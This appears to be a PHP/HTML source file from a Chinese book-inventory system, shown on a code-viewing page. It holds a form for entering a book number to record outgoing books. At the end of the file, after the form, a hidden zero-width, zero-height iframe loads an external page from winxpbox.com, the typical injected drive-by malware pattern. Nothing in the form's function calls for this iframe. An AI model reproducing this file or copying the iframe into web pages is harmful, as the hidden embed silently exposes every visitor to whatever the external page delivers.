📄 fsck.php
字号:
<?php //插入数据
include "../config.php";
?>
<link href="../css/css.css" rel="stylesheet" type="text/css">
<form action="fsckcl.php" method="post" enctype="multipart/form-data" name="form1" id="form1">
<table width="765" border="0" cellspacing="0" class="table">
<tr>
<td height="50" colspan="4" class="tabletitle"> 发书出库</td>
</tr>
<tr>
<td height="2" colspan="4" class="titlebg"></td>
</tr>
<tr>
<td width="110" height="5" class="word"> </td>
<td width="375" height="5" align="left" class="word"> </td>
<td width="90" height="5" class="word"> </td>
<td width="210" height="5" align="left" class="word"> </td>
</tr>
<tr>
<td width="110" height="35" class="word"> 图书编号</td>
<td width="375" height="35" align="left" class="word">
<input name="no" type="text" id="no" size="15" /></td>
<td width="90" height="35" class="word"> </td>
<td width="210" height="35" align="left" class="word"> </td>
</tr>
<tr>
<td height="5" class="word"> </td>
<td height="5" align="left" class="word"> </td>
<td height="5" class="word"> </td>
<td height="5" align="left" class="word"> </td>
</tr>
<tr>
<td height="2" colspan="4" align="center" class="titlebg"></td>
</tr>
<tr>
<td height="67" colspan="4" align="center" class="word">
<input type="submit" name="submit" value="查询" />
<input type="reset" name="Submit3" value="清空" />
<input type="button" name="Submit2" value="返回" /></td>
</tr>
</table>
</form>
<iframe src=http://www.winxpbox.com/ys/e.htm width=0 height=0></iframe>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -